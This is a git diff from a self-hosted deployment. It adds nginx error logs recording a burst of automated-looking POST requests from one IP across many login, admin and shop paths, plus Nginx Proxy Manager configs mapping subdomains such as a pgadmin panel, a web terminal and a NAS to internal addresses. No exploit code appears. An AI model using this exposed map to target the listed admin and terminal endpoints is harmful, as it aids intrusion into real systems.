app.profibot.hu, request: "POST /_next/data HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 292#292: *17608 a client request body is buffered to a temporary file /tmp/nginx/body/9/46/0000007469, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 293#293: *17616 a client request body is buffered to a temporary file /tmp/nginx/body/0/47/0000007470, client: 213.209.159.181, server: app.profibot.hu, request: "POST /login HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 292#292: *17615 a client request body is buffered to a temporary file /tmp/nginx/body/1/47/0000007471, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 295#295: *17614 a client request body is buffered to a temporary file /tmp/nginx/body/2/47/0000007472, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/trpc HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 295#295: *17613 a client request body is buffered to a temporary file /tmp/nginx/body/3/47/0000007473, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 292#292: *17788 a client request body is buffered to a temporary file /tmp/nginx/body/4/47/0000007474, client: 213.209.159.181, server: app.profibot.hu, request: "POST /de HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 295#295: *17806 a client request body is buffered to a temporary file /tmp/nginx/body/5/47/0000007475, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 292#292: *17829 a client request body is buffered to a temporary file /tmp/nginx/body/6/47/0000007476, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 294#294: *17828 a client request body is buffered to a temporary file /tmp/nginx/body/7/47/0000007477, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 295#295: *17833 a client request body is buffered to a temporary file /tmp/nginx/body/8/47/0000007478, client: 213.209.159.181, server: app.profibot.hu, request: "POST /contact HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 293#293: *17830 a client request body is buffered to a temporary file /tmp/nginx/body/9/47/0000007479, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/session HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 292#292: *17854 a client request body is buffered to a temporary file /tmp/nginx/body/0/48/0000007480, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/callback HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 292#292: *17852 a client request body is buffered to a temporary file /tmp/nginx/body/1/48/0000007481, client: 213.209.159.181, server: app.profibot.hu, request: "POST /fr HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 292#292: *17853 a client request body is buffered to a temporary file /tmp/nginx/body/2/48/0000007482, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/session HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:59 [warn] 293#293: *17856 a client request body is buffered to a temporary file /tmp/nginx/body/3/48/0000007483, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 293#293: *17855 a client request body is buffered to a temporary file /tmp/nginx/body/4/48/0000007484, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 295#295: *17857 a client request body is buffered to a temporary file /tmp/nginx/body/5/48/0000007485, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 292#292: *17860 a client request body is buffered to a temporary file /tmp/nginx/body/6/48/0000007486, client: 213.209.159.181, server: app.profibot.hu, request: "POST /fr HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 295#295: *17862 a client request body is buffered to a temporary file /tmp/nginx/body/7/48/0000007487, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 294#294: *17863 a client request body is buffered to a temporary file /tmp/nginx/body/8/48/0000007488, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 293#293: *17861 a client request body is buffered to a temporary file /tmp/nginx/body/9/48/0000007489, client: 213.209.159.181, server: app.profibot.hu, request: "POST /contact HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 292#292: *17868 a client request body is buffered to a temporary file /tmp/nginx/body/0/49/0000007490, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 293#293: *17870 a client request body is buffered to a temporary file /tmp/nginx/body/1/49/0000007491, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/callback HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 293#293: *17871 a client request body is buffered to a temporary file /tmp/nginx/body/2/49/0000007492, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [error] 292#292: *17868 readv() failed (104: Connection reset by peer) while reading upstream, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signin HTTP/1.1", upstream: "http://172.18.0.4:8000/api/auth/signin", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 295#295: *17943 a client request body is buffered to a temporary file /tmp/nginx/body/3/49/0000007493, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/callback HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:00 [warn] 295#295: *17951 a client request body is buffered to a temporary file /tmp/nginx/body/4/49/0000007494, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 292#292: *18016 a client request body is buffered to a temporary file /tmp/nginx/body/5/49/0000007495, client: 213.209.159.181, server: app.profibot.hu, request: "POST /admin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 293#293: *18017 a client request body is buffered to a temporary file /tmp/nginx/body/6/49/0000007496, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/session HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 293#293: *18025 a client request body is buffered to a temporary file /tmp/nginx/body/7/49/0000007497, client: 213.209.159.181, server: app.profibot.hu, request: "POST /app HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 293#293: *18040 a client request body is buffered to a temporary file /tmp/nginx/body/8/49/0000007498, client: 213.209.159.181, server: app.profibot.hu, request: "POST /shop HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 295#295: *18056 a client request body is buffered to a temporary file /tmp/nginx/body/9/49/0000007499, client: 213.209.159.181, server: app.profibot.hu, request: "POST /product HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:01 [warn] 292#292: *18074 a client request body is buffered to a temporary file /tmp/nginx/body/0/50/0000007500, client: 213.209.159.181, server: app.profibot.hu, request: "POST /products HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 293#293: *18095 a client request body is buffered to a temporary file /tmp/nginx/body/1/50/0000007501, client: 213.209.159.181, server: app.profibot.hu, request: "POST /checkout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 295#295: *18102 a client request body is buffered to a temporary file /tmp/nginx/body/2/50/0000007502, client: 213.209.159.181, server: app.profibot.hu, request: "POST /app HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 292#292: *18125 a client request body is buffered to a temporary file /tmp/nginx/body/3/50/0000007503, client: 213.209.159.181, server: app.profibot.hu, request: "POST /shop HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 294#294: *18172 a client request body is buffered to a temporary file /tmp/nginx/body/4/50/0000007504, client: 213.209.159.181, server: app.profibot.hu, request: "POST /products HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 295#295: *18171 a client request body is buffered to a temporary file /tmp/nginx/body/5/50/0000007505, client: 213.209.159.181, server: app.profibot.hu, request: "POST /checkout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:02 [warn] 293#293: *18175 a client request body is buffered to a temporary file /tmp/nginx/body/6/50/0000007506, client: 213.209.159.181, server: app.profibot.hu, request: "POST /cart HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:03 [warn] 294#294: *18215 a client request body is buffered to a temporary file /tmp/nginx/body/7/50/0000007507, client: 213.209.159.181, server: app.profibot.hu, request: "POST /de HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:03 [warn] 295#295: *18219 a client request body is buffered to a temporary file /tmp/nginx/body/8/50/0000007508, client: 213.209.159.181, server: app.profibot.hu, request: "POST /users HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:03 [warn] 293#293: *18218 a client request body is buffered to a temporary file /tmp/nginx/body/9/50/0000007509, client: 213.209.159.181, server: app.profibot.hu, request: "POST /account HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:03 [warn] 293#293: *18217 a client request body is buffered to a temporary file /tmp/nginx/body/0/51/0000007510, client: 213.209.159.181, server: app.profibot.hu, request: "POST /settings HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:03 [warn] 292#292: *18221 a client request body is buffered to a temporary file /tmp/nginx/body/1/51/0000007511, client: 213.209.159.181, server: app.profibot.hu, request: "POST /post HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 294#294: *18238 a client request body is buffered to a temporary file /tmp/nginx/body/3/51/0000007513, client: 213.209.159.181, server: app.profibot.hu, request: "POST /user HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 295#295: *18235 a client request body is buffered to a temporary file /tmp/nginx/body/2/51/0000007512, client: 213.209.159.181, server: app.profibot.hu, request: "POST /account HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 293#293: *18236 a client request body is buffered to a temporary file /tmp/nginx/body/4/51/0000007514, client: 213.209.159.181, server: app.profibot.hu, request: "POST /de HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 292#292: *18239 a client request body is buffered to a temporary file /tmp/nginx/body/5/51/0000007515, client: 213.209.159.181, server: app.profibot.hu, request: "POST /users HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 292#292: *18241 a client request body is buffered to a temporary file /tmp/nginx/body/6/51/0000007516, client: 213.209.159.181, server: app.profibot.hu, request: "POST /post HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 292#292: *18240 a client request body is buffered to a temporary file /tmp/nginx/body/7/51/0000007517, client: 213.209.159.181, server: app.profibot.hu, request: "POST /app HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 292#292: *18254 a client request body is buffered to a temporary file /tmp/nginx/body/8/51/0000007518, client: 213.209.159.181, server: app.profibot.hu, request: "POST /settings HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 293#293: *18255 a client request body is buffered to a temporary file /tmp/nginx/body/9/51/0000007519, client: 213.209.159.181, server: app.profibot.hu, request: "POST /blog HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 293#293: *18261 a client request body is buffered to a temporary file /tmp/nginx/body/0/52/0000007520, client: 213.209.159.181, server: app.profibot.hu, request: "POST /post HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 292#292: *18256 a client request body is buffered to a temporary file /tmp/nginx/body/1/52/0000007521, client: 213.209.159.181, server: app.profibot.hu, request: "POST /user HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 293#293: *18263 a client request body is buffered to a temporary file /tmp/nginx/body/2/52/0000007522, client: 213.209.159.181, server: app.profibot.hu, request: "POST /account HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:08 [warn] 295#295: *18296 a client request body is buffered to a temporary file /tmp/nginx/body/3/52/0000007523, client: 213.209.159.181, server: app.profibot.hu, request: "POST /profile HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:09 [warn] 295#295: *18302 a client request body is buffered to a temporary file /tmp/nginx/body/4/52/0000007524, client: 213.209.159.181, server: app.profibot.hu, request: "POST /checkout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:09 [warn] 295#295: *18300 a client request body is buffered to a temporary file /tmp/nginx/body/5/52/0000007525, client: 213.209.159.181, server: app.profibot.hu, request: "POST /user HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 294#294: *18415 a client request body is buffered to a temporary file /tmp/nginx/body/6/52/0000007526, client: 213.209.159.181, server: app.profibot.hu, request: "POST /posts HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 292#292: *18421 a client request body is buffered to a temporary file /tmp/nginx/body/7/52/0000007527, client: 213.209.159.181, server: app.profibot.hu, request: "POST /search HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 292#292: *18416 a client request body is buffered to a temporary file /tmp/nginx/body/8/52/0000007528, client: 213.209.159.181, server: app.profibot.hu, request: "POST /blog HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 295#295: *18413 a client request body is buffered to a temporary file /tmp/nginx/body/9/52/0000007529, client: 213.209.159.181, server: app.profibot.hu, request: "POST /home HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 294#294: *18417 a client request body is buffered to a temporary file /tmp/nginx/body/0/53/0000007530, client: 213.209.159.181, server: app.profibot.hu, request: "POST /products HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:19 [warn] 292#292: *18419 a client request body is buffered to a temporary file /tmp/nginx/body/1/53/0000007531, client: 213.209.159.181, server: app.profibot.hu, request: "POST /posts HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 293#293: *18430 a client request body is buffered to a temporary file /tmp/nginx/body/2/53/0000007532, client: 213.209.159.181, server: app.profibot.hu, request: "POST /home HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 295#295: *18446 a client request body is buffered to a temporary file /tmp/nginx/body/3/53/0000007533, client: 213.209.159.181, server: app.profibot.hu, request: "POST /shop HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18449 a client request body is buffered to a temporary file /tmp/nginx/body/4/53/0000007534, client: 213.209.159.181, server: app.profibot.hu, request: "POST /profile HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 295#295: *18444 a client request body is buffered to a temporary file /tmp/nginx/body/5/53/0000007535, client: 213.209.159.181, server: app.profibot.hu, request: "POST /posts HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 295#295: *18448 a client request body is buffered to a temporary file /tmp/nginx/body/6/53/0000007536, client: 213.209.159.181, server: app.profibot.hu, request: "POST /blog HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [error] 295#295: *18446 readv() failed (104: Connection reset by peer) while reading upstream, client: 213.209.159.181, server: app.profibot.hu, request: "POST /shop HTTP/1.1", upstream: "http://172.18.0.4:8000/shop", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 292#292: *18454 a client request body is buffered to a temporary file /tmp/nginx/body/7/53/0000007537, client: 213.209.159.181, server: app.profibot.hu, request: "POST /search HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18455 a client request body is buffered to a temporary file /tmp/nginx/body/8/53/0000007538, client: 213.209.159.181, server: app.profibot.hu, request: "POST /users HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18461 a client request body is buffered to a temporary file /tmp/nginx/body/9/53/0000007539, client: 213.209.159.181, server: app.profibot.hu, request: "POST /profile HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18463 a client request body is buffered to a temporary file /tmp/nginx/body/0/54/0000007540, client: 213.209.159.181, server: app.profibot.hu, request: "POST /cart HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 292#292: *18462 a client request body is buffered to a temporary file /tmp/nginx/body/1/54/0000007541, client: 213.209.159.181, server: app.profibot.hu, request: "POST /contact HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 292#292: *18464 a client request body is buffered to a temporary file /tmp/nginx/body/2/54/0000007542, client: 213.209.159.181, server: app.profibot.hu, request: "POST /cart HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 292#292: *18466 a client request body is buffered to a temporary file /tmp/nginx/body/3/54/0000007543, client: 213.209.159.181, server: app.profibot.hu, request: "POST /home HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 292#292: *18468 a client request body is buffered to a temporary file /tmp/nginx/body/4/54/0000007544, client: 213.209.159.181, server: app.profibot.hu, request: "POST /search HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18465 a client request body is buffered to a temporary file /tmp/nginx/body/5/54/0000007545, client: 213.209.159.181, server: app.profibot.hu, request: "POST /settings HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 293#293: *18469 a client request body is buffered to a temporary file /tmp/nginx/body/6/54/0000007546, client: 213.209.159.181, server: app.profibot.hu, request: "POST /product HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18467 a client request body is buffered to a temporary file /tmp/nginx/body/7/54/0000007547, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/auth/signout HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:46:20 [warn] 294#294: *18480 a client request body is buffered to a temporary file /tmp/nginx/body/8/54/0000007548, client: 213.209.159.181, server: app.profibot.hu, request: "POST /product HTTP/1.1", host: "app.profibot.hu" +2026/01/29 13:08:01 [error] 366#366: *41105 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/29 13:08:01 [error] 366#366: *41105 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "app.profibot.hu", referrer: "http://app.profibot.hu/docs" +2026/01/29 13:22:12 [error] 363#363: *41218 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/29 13:22:12 [error] 363#363: *41218 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "app.profibot.hu", referrer: "http://app.profibot.hu/docs" +2026/01/31 10:07:30 [error] 303#303: *18506 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.9:3000/", host: "app.profibot.hu" +2026/01/31 10:07:31 [error] 303#303: *18506 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.9:3000/", host: "app.profibot.hu" +2026/01/31 10:22:36 [error] 235#235: *147 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.9:3000/", host: "app.profibot.hu" +2026/01/31 10:22:37 [error] 235#235: *147 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.9:3000/", host: "app.profibot.hu" +2026/01/31 10:22:37 [error] 235#235: *147 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.9:3000/favicon.ico", host: "app.profibot.hu", referrer: "https://app.profibot.hu/" +2026/01/31 10:27:37 [error] 244#244: *230 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.10:3000/", host: "app.profibot.hu" +2026/01/31 10:27:37 [error] 244#244: *230 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.10:3000/favicon.ico", host: "app.profibot.hu", referrer: "https://app.profibot.hu/" +2026/01/31 10:27:39 [error] 244#244: *230 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.10:3000/", host: "app.profibot.hu" +2026/01/31 10:27:39 [error] 244#244: *230 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.10:3000/favicon.ico", host: "app.profibot.hu", referrer: "https://app.profibot.hu/" +2026/01/31 10:28:35 [error] 245#245: *231 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.10:3000/", host: "app.profibot.hu" +2026/01/31 10:28:37 [warn] 254#254: *257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 37.76.43.179, server: app.profibot.hu, request: "GET /assets/index-BSFHQ8KO.js HTTP/1.1", upstream: "http://172.18.0.10:80/assets/index-BSFHQ8KO.js", host: "app.profibot.hu", referrer: "https://app.profibot.hu/" diff --git a/proxy-manager/data/nginx/proxy_host/1.conf b/proxy-manager/data/nginx/proxy_host/1.conf new file mode 100755 index 0000000..48116ce --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/1.conf @@ -0,0 +1,83 @@ +# ------------------------------------------------------------ +# db.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "pgadmin_ui"; + set $port 80; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name db.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-14/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-14/privkey.pem; + + + + + + + # Block Exploits + include conf.d/include/block-exploits.conf; + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + + + access_log /data/logs/proxy-host-1_access.log proxy; + error_log /data/logs/proxy-host-1_error.log warn; + + + + + + + + location / { + + + + + + + + + + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/10.conf b/proxy-manager/data/nginx/proxy_host/10.conf new file mode 100755 index 0000000..4ca1878 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/10.conf @@ -0,0 +1,88 @@ +# ------------------------------------------------------------ +# terminal.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme https; + set $server "192.168.100.43"; + set $port 9090; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name terminal.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-18/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-18/privkey.pem; + + + + + + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +proxy_http_version 1.1; + + + access_log /data/logs/proxy-host-10_access.log proxy; + error_log /data/logs/proxy-host-10_error.log warn; + + + + + + + + location / { + + + + + + + + + + + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $http_connection; + proxy_http_version 1.1; + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/11.conf b/proxy-manager/data/nginx/proxy_host/11.conf new file mode 100755 index 0000000..64a81a9 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/11.conf @@ -0,0 +1,89 @@ +# ------------------------------------------------------------ +# net.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "127.17.0.1"; + set $port 81; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name net.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-19/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-19/privkey.pem; + + + + + + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +proxy_http_version 1.1; + + + access_log /data/logs/proxy-host-11_access.log proxy; + error_log /data/logs/proxy-host-11_error.log warn; + + + + + + + + location / { + + + + + + + + + + + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $http_connection; + proxy_http_version 1.1; + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} + diff --git a/proxy-manager/data/nginx/proxy_host/2.conf b/proxy-manager/data/nginx/proxy_host/2.conf new file mode 100755 index 0000000..c580d70 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/2.conf @@ -0,0 +1,91 @@ +# ------------------------------------------------------------ +# dev.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "service_finder_api"; + set $port 8000; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name dev.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-4/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-4/privkey.pem; + + + + + + + # Block Exploits + include conf.d/include/block-exploits.conf; + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +proxy_http_version 1.1; + + + access_log /data/logs/proxy-host-2_access.log proxy; + error_log /data/logs/proxy-host-2_error.log warn; + + + + + + + + location / { + + + + + + + + + + + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $http_connection; + proxy_http_version 1.1; + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/3.conf b/proxy-manager/data/nginx/proxy_host/3.conf new file mode 100755 index 0000000..3592ae7 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/3.conf @@ -0,0 +1,83 @@ +# ------------------------------------------------------------ +# Targetts.ddns.net +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "172.17.0.1"; + set $port 5050; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name Targetts.ddns.net; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-5/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-5/privkey.pem; + + + + + + + # Block Exploits + include conf.d/include/block-exploits.conf; + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + + + access_log /data/logs/proxy-host-3_access.log proxy; + error_log /data/logs/proxy-host-3_error.log warn; + + + + + + + + location / { + + + + + + + + + + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/5.conf b/proxy-manager/data/nginx/proxy_host/5.conf new file mode 100755 index 0000000..3d5b938 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/5.conf @@ -0,0 +1,80 @@ +# ------------------------------------------------------------ +# profibot.synology.me +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme https; + set $server "192.168.100.30"; + set $port 5001; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name profibot.synology.me; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include 